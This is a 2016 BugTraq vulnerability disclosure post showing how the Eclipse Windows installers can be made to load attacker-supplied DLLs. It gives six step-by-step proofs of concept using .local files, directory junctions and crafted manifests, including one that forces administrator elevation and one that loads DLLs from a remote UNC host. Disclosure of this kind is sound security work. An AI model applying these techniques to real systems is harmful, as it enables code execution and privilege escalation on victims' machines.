BugTraq
Executable installers are vulnerable^WEVIL (case 37): eclipse-inst-win*.exe vulnerable to DLL redirection and manifest hijacking Jul 23 2016 11:08AM
Stefan Kanthak (stefan kanthak nexgo de)
Hi @ll,

this is a followup to "case 36" (posted as "case 35" by mistake),
<http://seclists.org/bugtraq/2016/Jul/82>.

Proof of concept #1:
~~~~~~~~~~~~~~~~~~~~

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
executable installers "eclipse-inst-win32.exe" and
"eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the (empty) files "eclipse-inst-win32.exe.local" and
"eclipse-inst-win64.exe.local" in the directory where you
saved the downloaded installers:
Copy NUL: eclipse-inst-win32.exe.local
Copy NUL: eclipse-inst-win64.exe.local

3. Create empty files kernel32.dll, kernelbase.dll, advapi32.dll,
msvcrt.dll, ..., version.dll in the directory where you saved
the downloaded installers.

4. Execute the downloaded installers.

DOSSED!

5. Replace the empty DLLs created in step 3 with (malicious) DLLs
of your choice.

6. Execute the downloaded installer which matches the processor
architecture of the DLLs placed in step 5.

PWNED!

Proof of concept #2:
~~~~~~~~~~~~~~~~~~~~

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
executable installers "eclipse-inst-win32.exe" and
"eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the subdirectories "eclipse-inst-win32.exe.local" and
"eclipse-inst-win64.exe.local" in the directory where you
saved the downloaded installers.

3. Copy any (malicious) DLL of your choice as kernel32.dll,
kernelbase.dll, advapi32.dll, msvcrt.dll, ..., version.dll
into the subdirectories created in step 2 (32-bit DLLs
into "eclipse-inst-win32.exe.local", 64-bit DLLs into
"eclipse-inst-win64.exe.local").

4. Execute the downloaded installers.

DOSSED or PWNED!

Proof of concept #3:
~~~~~~~~~~~~~~~~~~~~

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
executable installers "eclipse-inst-win32.exe" and
"eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the junctions "eclipse-inst-win32.exe.local" and
"eclipse-inst-win64.exe.local" in the directory where you
saved the downloaded installers:
MkLink /J eclipse-inst-win32.exe.local %SystemRoot%\System32
MkLink /J eclipse-inst-win64.exe.local %SystemRoot%\SysWow64

3. Execute the downloaded installers.

DOSSED!

4. Create the two junctions to directories with malicious DLLs of
your choice if you want to get pwned instead.

5. Execute the downloaded installers.

PWNED!

Proof of concept #4:
~~~~~~~~~~~~~~~~~~~~

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
executable installers "eclipse-inst-win32.exe" and
"eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the files "eclipse-inst-win32.exe.manifest" and
"eclipse-inst-win64.exe.manifest" with the following contents
in the directory where you saved the downloaded installers:

--- eclipse-inst-win*.exe.manifest ---
<?xml version="1.0" encoding="US-ASCII" standalone="yes"?>
<assembly
manifestVersion="1.0"
xmlns="urn:schemas-microsoft-com:asm.v1">
</assembly>
--- EOF ---

3. Execute the downloaded installers.

DOSSED!

Proof of concept #5:
~~~~~~~~~~~~~~~~~~~~

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
executable installers "eclipse-inst-win32.exe" and
"eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the files "eclipse-inst-win32.exe.manifest" and
"eclipse-inst-win64.exe.manifest" with the following contents
in the directory where you saved the downloaded installers:

--- eclipse-inst-win*.exe.manifest ---
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly
manifestVersion="1.0"
xmlns="urn:schemas-microsoft-com:asm.v1">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="requireAdministrator"/>
</requestedPrivileges>
</security>
</trustInfo
</assembly>
--- EOF ---

3. Execute the downloaded installers:
Windows "user account control" will prompt for elevation, all
hijacked DLLs will be executed with administrative privileges.

PWNED!

Proof of concept #6:
~~~~~~~~~~~~~~~~~~~~

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
executable installers "eclipse-inst-win32.exe" and
"eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the files "eclipse-inst-win32.exe.manifest" and
"eclipse-inst-win64.exe.manifest" with the following contents
in the directory where you saved the downloaded installers:

--- eclipse-inst-win32.exe.manifest ---
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly
manifestVersion="1.0"
xmlns="urn:schemas-microsoft-com:asm.v1">
<file
loadFrom="\\127.0.0.1\ADMIN$\System32\Kernel32.Dll"
name="Kernel32.Dll" />
</assembly>
--- EOF ---

--- eclipse-inst-win64.exe.manifest ---
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly
manifestVersion="1.0"
xmlns="urn:schemas-microsoft-com:asm.v1">
<file
loadFrom="\\127.0.0.1\ADMIN$\SysWoW64\Kernel32.Dll"
name="Kernel32.Dll"/>
</assembly>
--- EOF ---

Optionally add more <file> elements for other DLLs loaded by
the installers as you like.

3. Execute the downloaded installers.

DOSSED!

4. Replace the UNC pathnames to your own host with UNC paths to
any host reachable from your network where you placed some
malicious DLLs to get pwned instead.

5. Execute the downloaded installers.

PWNED!

6. Add the <trustinfo> element from poc#5 to achieve remote code
execution with (user-assisted) escalation of privilege.

7. Execute the downloaded installers.

PWNED²!

stay tuned
Stefan Kanthak

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus